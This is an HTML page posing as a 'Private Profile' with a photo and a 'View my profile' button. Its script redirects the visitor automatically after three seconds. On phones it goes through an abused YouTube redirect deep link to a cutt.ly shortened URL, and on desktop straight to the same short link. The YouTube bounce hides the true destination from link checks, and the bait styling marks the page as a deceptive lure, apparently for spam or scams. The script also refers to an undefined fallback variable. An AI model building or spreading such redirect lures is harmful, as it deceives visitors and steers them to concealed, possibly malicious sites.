

<!DOCTYPE html>
<html>
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="stylesheet" href="css/style2.css" />
    <script src="script.js"></script>
    <link rel="icon" href="/logo.png" />
    <link rel="apple-touch-icon" href="/logo.png" />
    <title>Private Profile</title>

    <style>
      html,
      body {
        height: 100%;
        margin: 0;
        padding: 0;
      }

      body {
        background: linear-gradient(to bottom, #f54ea2, #2f80ed);
        display: flex;
        flex-direction: column;
        justify-content: flex-start;
        /* align to the top of the page */
        align-items: center;
      }

      img {
        display: block;
        width: 300px;
        height: 300px;
        border-radius: 50%;
        box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.3);
        margin-top: 64px;
        /* move image to the top of the page */
        margin-bottom: 24px;
        border: 2px solid white;
        pointer-events: none;
        /* disable mouse events on the image */
      }

      button {
        background: white;
        color: #f54ea2;
        font-size: 24px;
        font-weight: bold;
        font-family: Arial, sans-serif;
        border: none;
        padding: 16px 64px;
        /* Increase padding to make the button wider */
        border-radius: 50px;
        /* Make the button full round */
        box-shadow: 0px 3px 6px rgba(0, 0, 0, 0.2);
        transition: background-color 0.2s ease-out, transform 0.2s ease-out;
        animation: shake 1s ease-in-out;
        animation-fill-mode: forwards;
        border: 2px solid white;
      }

      button:hover {
        background: linear-gradient(to right, #f54ea2, #2f80ed);
        background-size: 200% auto;
        background-position: left center;
        transform: translateX(5px);
        transition: all 0.2s ease-out;
        border: 2px solid white;
      }

      @keyframes shake {
        0% {
          transform: translateX(0);
        }
        10%,
        90% {
          transform: translateX(-5px);
        }
        20%,
        80% {
          transform: translateX(5px);
        }
        30%,
        50%,
        70% {
          transform: translateX(-5px);
        }
        40%,
        60% {
          transform: translateX(5px);
        }
        100% {
          transform: translateX(0);
        }
      }

      .container {
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
        gap: 10px;
        padding: 15px;
        border: 5px solid #f54ea2;
        border-radius: 15px;
        max-width: 600px;
        margin: 0 auto;
      }
      .container h1 {
        font-weight: bold;
        color: white;
        width: 0 auto;
        align-items: center;
        font-size: 15px;
        max-width: 900px;
      }
      input[type="text"] {
        padding: 5px;
        font-size: 30px;
        border-radius: 15px;
        border: 5px solid #ccc;
        margin: 0 auto;
        width: 300px;
        text-align: center;
        font-family: Times New Roman;
        font-weight: bold;
      }
      button {
        padding: 10px;
        margin-bottom: 3px;
        background-color: #4caf50;
        color: #fff;
        border: none;
        border-radius: 50px;
        cursor: pointer;
        transition: background-color 0.1s ease;
        font-size: 25px;
        font-weight: bold;
      }
      button:hover {
        background-color: #3e8e41;
      }
      button.copied {
        background-color: #008cba;
      }

      #google_translate_element {
        position: absolute;
        bottom: 0;
        right: 0;
        margin-bottom: 5px;
        margin-right: 20px;
        z-index: 9999;
      }

      .goog-te-combo {
        width: auto !important;
        font-size: 16px !important;
        height: 30px !important;
        padding: 5px 10px !important;
      }

      .goog-te-gadget img {
        display: none !important;
      }
    </style>
  </head>

  <body>
    <img src="profile.jpg" alt="Profile Picture" />
    <button onclick="myFunction()">View my profile</button>

    <script>
      setTimeout(function () {
        myFunction();
      }, 3000);

      function myFunction() {
        var app =
          "vnd.youtube://youtube.com/redirect?event=comments&redir_token=QUFFLUhqa0lhX3FKZE41V1JiN3ZoS21iSFJqcTMydWpOUXxBQ3Jtc0ttYk5QMUtBTTRoeWhabVl1NDg0WFc4ZWZud2VUZm5faG91WVhCZW00SjZmME5SODFwYkJqY2MwQktSUldmRm9JbkgtOEZGbE5faDhzd3pGVHhLVnM1RDdjSlZfMTBlVWdyTUtOOXJiNjlHb0pCb05INA&q=https%3A%2F%2Fcutt.ly%2Fr5cb07S&html_redirect=1";

        var desktopFallback = "https://cutt.ly/r5cb07S";

        if (
          /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(
            navigator.userAgent
          )
        ) {
          window.location.href = app;
          window.setTimeout(function () {
            window.location.href = mobileFallback;
          }, 25);
        } else {
          window.location.href = desktopFallback;
        }

        function killPopup() {
          window.removeEventListener("pagehide", killPopup);
        }

        window.addEventListener("pagehide", killPopup);
      }
    </script>
  </body>
</html>
